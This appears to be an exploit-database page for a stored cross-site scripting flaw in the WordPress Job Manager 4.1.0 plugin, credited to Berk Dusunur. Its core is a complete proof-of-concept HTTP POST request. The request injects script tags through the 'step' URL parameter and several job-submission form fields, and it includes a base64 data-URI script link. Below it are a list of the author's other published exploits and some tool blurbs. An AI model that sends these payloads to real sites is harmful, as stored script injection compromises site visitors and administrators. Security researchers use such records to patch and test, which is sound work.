Search for hundreds of thousands of exploits

"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

php

Release date

Exploit published date

2018-07-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site
Scripting
# Google Dork: N/A
# Date: 2018-07-15
# Exploit Author: Berk Dusunur & Selimcan Ozdemir
# Vendor Homepage: https://wpjobmanager.com
# Software Link: https://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Affected Version: v4.1.0
# Tested on: Parrot OS / WinApp Server
# CVE : N/A

# Proof Of Concept


POST
/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
Content-Type: multipart/form-data;
boundary=---------------------------3756777582569023921817540904
Content-Length: 2379
Cookie: wp-job-manager-submitting-job-id=88664;
wp-job-manager-submitting-job-key=5ae8875580aff
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_title"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_description"

test</p></div></div><form input=""><p></p><script>alert('1')</script><a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_region"

184
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_type"

2
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="application"

www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_location"

Adelaide, Australia
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_name"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_tagline"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_website"

www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_name"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_email"

xssiletarihyazilmaz@gmail.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_manager_form"

submit-job
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_id"

0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="step"


-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="submit_job"

Preview
-----------------------------3756777582569023921817540904--
Release DateTitleTypePlatformAuthor
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-01-29"Liferay CE Portal 6.0.2 - Remote Command Execution"webappsjava"Berk Dusunur"
2018-10-29"Grapixel New Media 2 - 'pageref' SQL Injection"webappsphp"Berk Dusunur"
2018-08-23"PCViewer vt1000 - Directory Traversal"webappswindows"Berk Dusunur"
2018-07-23"Synology DiskStation Manager 4.1 - Directory Traversal"webappslinux"Berk Dusunur"
2018-07-23"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution"webappshardware"Berk Dusunur"
2018-07-22"GeoVision GV-SNVR0811 - Directory Traversal"webappshardware"Berk Dusunur"
2018-07-16"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting"webappsphp"Berk Dusunur"
2018-07-10"WolfSight CMS 3.2 - SQL Injection"webappsphp"Berk Dusunur"
2018-06-28"hycus CMS 1.0.4 - Authentication Bypass"webappsphp"Berk Dusunur"
2018-06-22"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)"webappsphp"Berk Dusunur"
2018-06-20"NewMark CMS 2.1 - 'sec_id' SQL Injection"webappslinux"Berk Dusunur"
2018-06-18"Redatam Web Server < 7 - Directory Traversal"webappswindows"Berk Dusunur"
2018-05-21"Zenar Content Management System - Cross-Site Scripting"webappsphp"Berk Dusunur"
2018-05-18"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)"webappsphp"Berk Dusunur"
2018-03-26"Acrolinx Server < 5.2.5 - Directory Traversal"remotewindows"Berk Dusunur"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45031/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.